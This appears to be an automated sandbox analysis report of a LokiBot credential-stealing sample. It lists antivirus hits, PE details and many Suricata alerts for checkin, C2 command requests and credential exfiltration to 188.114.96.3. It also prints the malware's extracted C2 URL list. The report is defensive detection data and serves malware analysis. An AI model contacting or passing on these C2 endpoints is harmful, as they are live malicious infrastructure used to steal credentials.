                2024-09-25T15:30:24.350366+020028257661Malware Command and Control Activity Detected192.168.2.455989188.114.96.380TCP
                2024-09-25T15:30:25.290428+020028257661Malware Command and Control Activity Detected192.168.2.455990188.114.96.380TCP
                2024-09-25T15:30:26.169979+020028257661Malware Command and Control Activity Detected192.168.2.455991188.114.96.380TCP
                2024-09-25T15:30:27.001129+020028257661Malware Command and Control Activity Detected192.168.2.455992188.114.96.380TCP
                2024-09-25T15:30:27.899264+020028257661Malware Command and Control Activity Detected192.168.2.455993188.114.96.380TCP
                2024-09-25T15:30:28.753857+020028257661Malware Command and Control Activity Detected192.168.2.455994188.114.96.380TCP
                2024-09-25T15:30:29.618078+020028257661Malware Command and Control Activity Detected192.168.2.455995188.114.96.380TCP
                2024-09-25T15:30:30.428677+020028257661Malware Command and Control Activity Detected192.168.2.455996188.114.96.380TCP
                2024-09-25T15:30:31.273028+020028257661Malware Command and Control Activity Detected192.168.2.455997188.114.96.380TCP
                2024-09-25T15:30:32.135559+020028257661Malware Command and Control Activity Detected192.168.2.455998188.114.96.380TCP
                2024-09-25T15:30:33.256022+020028257661Malware Command and Control Activity Detected192.168.2.455999188.114.96.380TCP
                2024-09-25T15:30:34.073488+020028257661Malware Command and Control Activity Detected192.168.2.456000188.114.96.380TCP
                2024-09-25T15:30:35.801198+020028257661Malware Command and Control Activity Detected192.168.2.456001188.114.96.380TCP
                2024-09-25T15:30:37.771542+020028257661Malware Command and Control Activity Detected192.168.2.456002188.114.96.380TCP
                2024-09-25T15:30:38.713862+020028257661Malware Command and Control Activity Detected192.168.2.456003188.114.96.380TCP
                2024-09-25T15:30:39.594556+020028257661Malware Command and Control Activity Detected192.168.2.456004188.114.96.380TCP
                2024-09-25T15:30:40.433961+020028257661Malware Command and Control Activity Detected192.168.2.456005188.114.96.380TCP
                2024-09-25T15:30:41.413983+020028257661Malware Command and Control Activity Detected192.168.2.456006188.114.96.380TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 1e#U0414.exeAvira: detected
                Source: http://kbfvzoboss.bid/alien/fre.phpAvira URL Cloud: Label: phishing
                Source: http://alphastand.win/alien/fre.phpAvira URL Cloud: Label: phishing
                Source: https://dddotx.shop/Mine/PWS/fre.phpAvira URL Cloud: Label: malware
                Source: http://alphastand.top/alien/fre.phpAvira URL Cloud: Label: malware
                Source: http://dddotx.shop/Mine/PWS/fre.phpAvira URL Cloud: Label: malware
                Source: http://alphastand.trade/alien/fre.phpAvira URL Cloud: Label: malware
                Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}
                Source: 1e#U0414.exeReversingLabs: Detection: 34%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 1e#U0414.exeJoe Sandbox ML: detected
                Source: 1e#U0414.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 1e#U0414.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: BATMAN.pdbxD source: 1e#U0414.exe, 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1751491077.00000000058B0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: Sept24.pdbBSJB source: 1e#U0414.exe
                Source: Binary string: Sept24.pdb source: 1e#U0414.exe
                Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3002754602.00000000009C2000.00000002.00000001.01000000.00000008.sdmp
                Source: Binary string: BATMAN.pdb source: 1e#U0414.exe, 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, 1e#U0414.exe, 00000000.00000002.1751491077.00000000058B0000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55892 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55932 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55892 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55932 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55932 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55892 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55947 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55947 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55947 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55894 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55894 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55894 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55947 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55947 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49745 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49745 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49745 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49734 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55890 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49734 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49734 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55927 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55890 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55890 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55896 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55927 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55896 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55919 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55896 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55903 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55919 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55919 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55927 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55903 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49730 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49730 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55902 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55922 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55900 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55890 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55902 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49734 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55902 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55898 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55922 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55922 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55890 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49734 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55932 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55900 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55932 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49740
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55919 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55903 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55989 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49730 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49731 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55922 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49731 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49731 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49745 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55919 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55947
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49745 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55989 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55925 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55925 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55892 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55895 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55892 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55895 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55895 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55890
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55900 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55917 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55989 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:56006 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55897 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55902 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49730 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49735 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55895 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55898 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49736 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55894 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55917 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55896 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55917 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55896 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55967 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55902 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55892
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55925 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55895 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49732 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55927 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55927 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55924 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55925 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55925 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55967 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55943 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55899 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55900 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49736
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49733 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49733 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49732 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49732 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55893 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55968 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55893 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55917 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55989 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49732 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49732 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55986 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55897 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55903 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55894 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55924 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55924 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55967 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55943 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55943 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49741
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55899 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55967 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55967 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55922 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55900 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55896
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55943 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55943 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55900
